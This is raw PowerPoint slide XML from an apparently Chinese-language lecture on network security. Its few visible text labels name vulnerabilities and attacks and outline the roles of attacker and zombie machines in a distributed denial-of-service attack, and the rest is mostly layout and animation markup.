                <a:gd name="T14" fmla="*/ 0 w 173"/>
                <a:gd name="T15" fmla="*/ 0 h 125"/>
                <a:gd name="T16" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="椭圆 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3500438" y="1500188"/>
            <a:ext cx="2571750" cy="53578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2" name="TextBox 92"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4286250" y="6000750"/>
            <a:ext cx="1143000" cy="461963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>傀儡</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144"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38914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89131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(in)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389131"/>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389137"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389137"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389141"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38914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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389139"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389139"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389138"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389138"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="33" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389140"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="37" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="38" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389142"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389142"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="15" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389133"/>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89133"/>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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="4" presetClass="entr" presetSubtype="32" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389143"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(out)">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389143"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="52" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="53" presetID="15" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389134"/>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89134"/>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5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="60" presetID="15" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389135"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389135"/>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389135"/>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6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="67" presetID="15" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="389136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389136"/>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3891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1" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="389137" grpId="0" animBg="1"/>
      <p:bldP spid="389138" grpId="0" animBg="1"/>
      <p:bldP spid="389139" grpId="0" animBg="1"/>
      <p:bldP spid="389140" grpId="0" animBg="1"/>
      <p:bldP spid="389141" grpId="0" animBg="1"/>
      <p:bldP spid="389142" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="38914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08258" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1763713" y="1287463"/>
          <a:ext cx="4824412" cy="5670550"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s623709" name="Visio" r:id="rId1" imgW="4199255" imgH="4933315" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId1" imgW="4199255" imgH="4933315" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 62370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287463"/>
                        <a:ext cx="4824412" cy="567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8259" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability and Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69634" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5129336" y="6407944"/>
            <a:ext cx="1026840"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B9C9CBE-180E-425A-82DF-C64AAD59234E}" type="datetime1">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1000" smtClean="0"/>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1000"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8258"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="608258"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="608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2887112C-F3F0-47E2-B9D5-6B44E4EC68E2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>分布式拒绝服务攻击(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDoS)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387170" name="PPBand283"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="2781300"/>
            <a:ext cx="1573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50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="de-DE" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>发起攻击</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="3505200"/>
            <a:ext cx="1268412" cy="1223963"/>
            <a:chOff x="179512" y="3505200"/>
            <a:chExt cx="1268288" cy="1223665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37992" name="Picture 90" descr="desktopp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3505200"/>
              <a:ext cx="692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3" name="PPBand281"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="179512" y="4267200"/>
              <a:ext cx="1268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50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                <a:t>攻击者</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37994" name="Picture 99"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609600" y="3505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bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2778125"/>
            <a:ext cx="3733800" cy="2327275"/>
            <a:chOff x="1371600" y="2777526"/>
            <a:chExt cx="3733800" cy="2327874"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37986" name="Line 105"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1371600" y="2819400"/>
              <a:ext cx="2743200" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">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7" name="Line 106"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3962400"/>
              <a:ext cx="3733800" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">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8" name="Line 107"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3962400"/>
              <a:ext cx="2057400" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">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9" name="Line 108"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3962400"/>
              <a:ext cx="2743200" cy="1143000"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">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0" name="Line 109"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1447800" y="3200400"/>
              <a:ext cx="3657600" cy="762000"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">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1" name="PPBand284"/>
